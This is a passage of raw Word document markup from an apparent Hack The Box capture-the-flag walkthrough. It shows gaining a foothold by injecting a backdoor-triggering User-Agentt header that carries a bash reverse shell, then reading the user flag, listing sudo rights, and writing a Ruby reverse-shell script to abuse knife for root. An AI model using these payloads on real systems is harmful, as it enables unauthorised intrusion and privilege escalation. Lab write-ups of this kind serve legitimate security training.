    <w:p w14:paraId="65C8803A" w14:textId="77777777" w:rsidR="00C62B81" w:rsidRDefault="00DE08E2" w:rsidP="00C62B81">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00DE08E2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A8DEF82" wp14:editId="115E0D6C">
            <wp:extent cx="5731510" cy="389191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E5119" w14:textId="72348A18" w:rsidR="00431918" w:rsidRDefault="00C62B81" w:rsidP="00C62B81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4</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> multi/handler configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA61D33" w14:textId="21BAF682" w:rsidR="00F32A4E" w:rsidRDefault="00F32A4E" w:rsidP="00F32A4E"/>
    <w:p w14:paraId="1C8FAFEC" w14:textId="12E1D7DA" w:rsidR="00F32A4E" w:rsidRDefault="00F32A4E" w:rsidP="00F32A4E">
      <w:r>
        <w:t>With the listener now running it is time to load up Burp</w:t>
      </w:r>
      <w:r w:rsidR="008A2D84">
        <w:t>suite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A18DF">
        <w:t>and intercept a GET request</w:t>
      </w:r>
      <w:r w:rsidR="00DD70EE">
        <w:t>, send it to the repeater</w:t>
      </w:r>
      <w:r w:rsidR="00CC1363">
        <w:t>, add the additional header with code to send us a shell, and send the request.</w:t>
      </w:r>
      <w:r w:rsidR="00D63A33">
        <w:t xml:space="preserve"> This will then give access to the system using a command line shell</w:t>
      </w:r>
      <w:r w:rsidR="00F52258">
        <w:t xml:space="preserve"> where it will be possible to elevate the privileges to a root user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A66712" w14:textId="3B40FBF8" w:rsidR="00354C05" w:rsidRDefault="004C7112" w:rsidP="00F32A4E">
      <w:r>
        <w:t>Once Burpsuite has loaded</w:t>
      </w:r>
      <w:r w:rsidR="00354C05">
        <w:t xml:space="preserve">, click the proxy tab and open the </w:t>
      </w:r>
      <w:r w:rsidR="007A3C18">
        <w:t>built-in</w:t>
      </w:r>
      <w:r w:rsidR="00354C05">
        <w:t xml:space="preserve"> browser</w:t>
      </w:r>
      <w:r w:rsidR="007A3C18">
        <w:t xml:space="preserve">. This browser is already configured to intercept </w:t>
      </w:r>
      <w:r w:rsidR="00036819">
        <w:t>web requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470F322F" w14:textId="24E3D942" w:rsidR="007D1E94" w:rsidRDefault="007D1E94" w:rsidP="00F32A4E">
      <w:r>
        <w:t>Once the browser has loaded</w:t>
      </w:r>
      <w:r w:rsidR="00270A8B">
        <w:t xml:space="preserve"> enter the following in the address bar</w:t>
      </w:r>
      <w:r w:rsidR="00CE53E2">
        <w:t xml:space="preserve"> and press enter</w:t>
      </w:r>
      <w:r w:rsidR="00270A8B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE1F109" w14:textId="22E8B83E" w:rsidR="00270A8B" w:rsidRDefault="00270A8B" w:rsidP="00F32A4E"/>
    <w:p w14:paraId="7464D9CC" w14:textId="322D91D1" w:rsidR="00CE53E2" w:rsidRDefault="00270A8B" w:rsidP="00F32A4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00CE53E2" w:rsidRPr="005E2C95">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:i/>
            <w:iCs/>
          </w:rPr>
          <w:t>http://victim_ip:80</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2DC9E89C" w14:textId="706684DF" w:rsidR="00EB505A" w:rsidRDefault="002C0D79" w:rsidP="00F32A4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Now, in the interceptor tab forward </w:t>
      </w:r>
      <w:r w:rsidR="00EB505A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidR="00814BD6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>the requests.</w:t>
      </w:r>
      <w:r w:rsidR="00EB505A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Now click the HTTP history tab</w:t>
      </w:r>
      <w:r w:rsidR="00B75063">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>, right click on the first request in the list and send to repeater.</w:t>
      </w:r>
      <w:r w:rsidR="00814BD6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Make sure the first one</w:t>
      </w:r>
      <w:r w:rsidR="00453A49">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> has the victim IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC118C5" w14:textId="4A3D79BD" w:rsidR="00744CF5" w:rsidRDefault="00964CF2" w:rsidP="00F32A4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Add the following line above the </w:t>
      </w:r>
      <w:r w:rsidR="00453A49">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00052F74">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>connection: close</w:t>
      </w:r>
      <w:r w:rsidR="00453A49">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00052F74">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> header.</w:t>
      </w:r>
      <w:r w:rsidR="00726EEB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Make sure it is one single line</w:t>
      </w:r>
      <w:r w:rsidR="00557DEB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B0767F" w14:textId="13BEBDE1" w:rsidR="00052F74" w:rsidRDefault="00052F74" w:rsidP="00F32A4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17872F1E" w14:textId="1FB54497" w:rsidR="00052F74" w:rsidRDefault="00052F74" w:rsidP="00726EEB">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E7E5E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="007E7E5E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Agentt: zerodiumsystem(</w:t>
      </w:r>
      <w:r w:rsidR="00726EEB" w:rsidRPr="00726EEB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>"/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/</w:t>
      </w:r>
      <w:r w:rsidR="00126820">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>your_ip</w:t>
      </w:r>
      <w:r w:rsidR="00726EEB" w:rsidRPr="00726EEB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00126820">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r w:rsidR="00726EEB" w:rsidRPr="00726EEB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 0&gt;&amp;1'"</w:t>
      </w:r>
      <w:r w:rsidRPr="007E7E5E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E80F235" w14:textId="24BA075F" w:rsidR="001B3F9F" w:rsidRDefault="001B3F9F" w:rsidP="001B3F9F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FB989E7" w14:textId="08150676" w:rsidR="001B3F9F" w:rsidRDefault="001B3F9F" w:rsidP="001B3F9F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Click send and go back to the Metasploit window and you will have spawned a shell</w:t>
      </w:r>
      <w:r w:rsidR="009D7460">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. Congratulations you are in!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D10139" w14:textId="4428C07F" w:rsidR="00812673" w:rsidRDefault="00812673" w:rsidP="001B3F9F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D3C9328" w14:textId="77777777" w:rsidR="00812673" w:rsidRDefault="00812673" w:rsidP="00812673">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00812673">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B63B32C" wp14:editId="1ADD7E25">
            <wp:extent cx="2686425" cy="390580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DAB57" w14:textId="3DA31086" w:rsidR="00812673" w:rsidRDefault="00812673" w:rsidP="00812673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5</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> a screenshot showing the user in the spawned shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37683696" w14:textId="3402FBD9" w:rsidR="00615364" w:rsidRDefault="00615364" w:rsidP="00615364"/>
    <w:p w14:paraId="6A6BEA21" w14:textId="22DD4B65" w:rsidR="00BD627D" w:rsidRDefault="00554FCE" w:rsidP="00615364">
      <w:r>
        <w:t>From within th</w:t>
      </w:r>
      <w:r w:rsidR="00A82671">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
      <w:r w:rsidR="00A82671">
        <w:t xml:space="preserve"> the user flag can now be captured with the following command</w:t>
      </w:r>
      <w:r w:rsidR="00F30F9C">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA225A7" w14:textId="4D8B47D7" w:rsidR="00F30F9C" w:rsidRDefault="00F30F9C" w:rsidP="00615364"/>
    <w:p w14:paraId="734FEA94" w14:textId="6792AC8E" w:rsidR="00F30F9C" w:rsidRDefault="00F30F9C" w:rsidP="00615364">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>cat /home/james/user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F2B050" w14:textId="79628FAD" w:rsidR="00F30F9C" w:rsidRDefault="00F30F9C" w:rsidP="00615364">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73566328" w14:textId="77777777" w:rsidR="00AF622E" w:rsidRDefault="00AF622E" w:rsidP="00AF622E">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00AF622E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D794A3F" wp14:editId="512223E2">
            <wp:extent cx="4001058" cy="80021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EDCE7" w14:textId="33058995" w:rsidR="00F30F9C" w:rsidRDefault="00AF622E" w:rsidP="00AF622E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6</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> output from the </w:t>
      </w:r>
      <w:r w:rsidR="00B16C25">
        <w:t>cat /home/james/user.txt command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369E7E2F" w14:textId="795B9541" w:rsidR="00B16C25" w:rsidRDefault="00B16C25" w:rsidP="00B16C25"/>
    <w:p w14:paraId="4979EA0E" w14:textId="34974516" w:rsidR="00B16C25" w:rsidRDefault="00B16C25" w:rsidP="00B16C25">
      <w:r>
        <w:t xml:space="preserve">Copy and paste the long string of letters and numbers </w:t>
      </w:r>
      <w:r w:rsidR="00453A49">
        <w:t>(hash</w:t>
      </w:r>
      <w:r w:rsidR="00162DF2">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t>into the submission box on the HTB website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C27F53" w14:textId="6A9B6220" w:rsidR="0058408A" w:rsidRDefault="0058408A" w:rsidP="00B16C25"/>
    <w:p w14:paraId="661050B2" w14:textId="6E930026" w:rsidR="0058408A" w:rsidRDefault="0058408A" w:rsidP="0058408A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc74569236"/>
      <w:r>
        <w:t>Privilege escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="1879B083" w14:textId="26482BFC" w:rsidR="009B712F" w:rsidRDefault="00DE0581" w:rsidP="009B712F">
      <w:r>
        <w:t xml:space="preserve">Running the following command will show </w:t>
      </w:r>
      <w:r w:rsidR="00934F03">
        <w:t xml:space="preserve">what commands </w:t>
      </w:r>
      <w:r w:rsidR="0047341D">
        <w:t xml:space="preserve">are allowed by </w:t>
      </w:r>
      <w:r w:rsidR="00934F03">
        <w:t>the current user</w:t>
      </w:r>
      <w:r w:rsidR="0047341D">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CC333F" w14:textId="06D77218" w:rsidR="0047341D" w:rsidRDefault="0047341D" w:rsidP="009B712F">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1240ACE8" w14:textId="4A1E90F7" w:rsidR="0047341D" w:rsidRDefault="0047341D" w:rsidP="009B712F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00162DF2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>udo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6E1E4A" w14:textId="078CE5C9" w:rsidR="0047341D" w:rsidRDefault="0047341D" w:rsidP="009B712F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7481D401" w14:textId="77777777" w:rsidR="00B53757" w:rsidRDefault="00B53757" w:rsidP="00B53757">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00B53757">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54DB2401" wp14:editId="7BC3EF10">
            <wp:extent cx="5731510" cy="97028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80EE2" w14:textId="0FD66E3E" w:rsidR="0047341D" w:rsidRDefault="00B53757" w:rsidP="00B53757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7</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> output from the 'sudo -l' command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F53AF6" w14:textId="44E3F171" w:rsidR="00B53757" w:rsidRDefault="00B53757" w:rsidP="00B53757"/>
    <w:p w14:paraId="77B2627A" w14:textId="6642C3DF" w:rsidR="00B53757" w:rsidRDefault="00147334" w:rsidP="00B53757">
      <w:r>
        <w:t xml:space="preserve">The output shows that the file </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7407">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>knife</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the directory </w:t>
      </w:r>
      <w:r w:rsidR="00CA7407">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/usr/bin/</w:t>
      </w:r>
      <w:r w:rsidR="00CA7407">
        <w:t xml:space="preserve"> can be run as a root user</w:t>
      </w:r>
      <w:r w:rsidR="00D378BE">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00814BB9">
        <w:t xml:space="preserve"> Looking inside the file shows </w:t>
      </w:r>
      <w:r w:rsidR="00A9576A">
        <w:t>a long list of Ruby binaries (Gems).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A61248B" w14:textId="2EE542A8" w:rsidR="004C7031" w:rsidRDefault="004C7031" w:rsidP="00B53757"/>
    <w:p w14:paraId="132E1D63" w14:textId="77777777" w:rsidR="00F46E7E" w:rsidRDefault="00F46E7E" w:rsidP="00F46E7E">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00F46E7E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AFE8EBF" wp14:editId="4FD61603">
            <wp:extent cx="5731510" cy="207327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AEEE4" w14:textId="1ABC6284" w:rsidR="00F46E7E" w:rsidRDefault="00F46E7E" w:rsidP="00F46E7E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8</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="00162DF2">
        <w:t xml:space="preserve"> the end of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a list of Ruby Gems from the file /var/bin/knife</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB40A1B" w14:textId="47F48B19" w:rsidR="0024103C" w:rsidRDefault="0024103C" w:rsidP="0024103C"/>
    <w:p w14:paraId="0B890E09" w14:textId="6FEB33F6" w:rsidR="0024103C" w:rsidRDefault="00711285" w:rsidP="0024103C">
      <w:r>
        <w:t>Now to get a root shell</w:t>
      </w:r>
      <w:r w:rsidR="000547FF">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000547FF">
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pen a new terminal window and create a </w:t>
      </w:r>
      <w:r w:rsidR="000F2F8F">
        <w:t>ruby file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D178006" w14:textId="3DC616D5" w:rsidR="000F2F8F" w:rsidRDefault="000F2F8F" w:rsidP="0024103C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7366CF0E" w14:textId="643EA83B" w:rsidR="000F2F8F" w:rsidRDefault="000F2F8F" w:rsidP="0024103C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ab/>
      </w:r>
      <w:r w:rsidR="00087262">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>vim rootshell.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C8BC1E" w14:textId="79E5BF2F" w:rsidR="00AA0ED0" w:rsidRDefault="00AA0ED0" w:rsidP="0024103C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DE46AAD" w14:textId="26AC3C9F" w:rsidR="00AA0ED0" w:rsidRDefault="00AA0ED0" w:rsidP="0024103C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Within the file type the following code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389E727C" w14:textId="319AC6E8" w:rsidR="00AA0ED0" w:rsidRDefault="00AA0ED0" w:rsidP="0024103C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19CD6D2D" w14:textId="7C0158DF" w:rsidR="00AA0ED0" w:rsidRDefault="006802A5" w:rsidP="0024103C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DC3ED8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00CE1E11">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ystem(</w:t>
      </w:r>
      <w:r w:rsidR="00CD7A50">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>“/bin/bash -c ‘bash</w:t>
      </w:r>
      <w:r w:rsidR="00F340E0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -I &gt;&amp; /dev/tcp/your_ip/port</w:t>
      </w:r>
      <w:r w:rsidR="00735EC1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 0&gt;&amp;1’</w:t>
      </w:r>
      <w:r w:rsidR="00CD7A50">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00CE1E11">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52737FAC" w14:textId="33F5C739" w:rsidR="00735EC1" w:rsidRDefault="00735EC1" w:rsidP="0024103C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76E89219" w14:textId="453C22AF" w:rsidR="00735EC1" w:rsidRDefault="00735EC1" w:rsidP="0024103C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Save the file</w:t>
      </w:r>
      <w:r w:rsidR="00155343">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and boot up a python 3 server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CE6CE4" w14:textId="31343BB9" w:rsidR="00155343" w:rsidRDefault="00155343" w:rsidP="0024103C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BE3FA54" w14:textId="29DEB10B" w:rsidR="00155343" w:rsidRDefault="00155343" w:rsidP="0024103C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ab/>
      </w:r>
      <w:r w:rsidR="00464BDB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3AB2AF" w14:textId="69E5CC8C" w:rsidR="000F5EFC" w:rsidRDefault="000F5EFC" w:rsidP="0024103C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B7DBF98" w14:textId="77777777" w:rsidR="000F5EFC" w:rsidRDefault="000F5EFC" w:rsidP="000F5EFC">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="000F5EFC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B8F75AE" wp14:editId="1A309619">
            <wp:extent cx="5731510" cy="467995"/>
            <wp:effectExtent l="0" t="0" r="254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5030F" w14:textId="4598BA83" w:rsidR="000F5EFC" w:rsidRDefault="000F5EFC" w:rsidP="000F5EFC">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
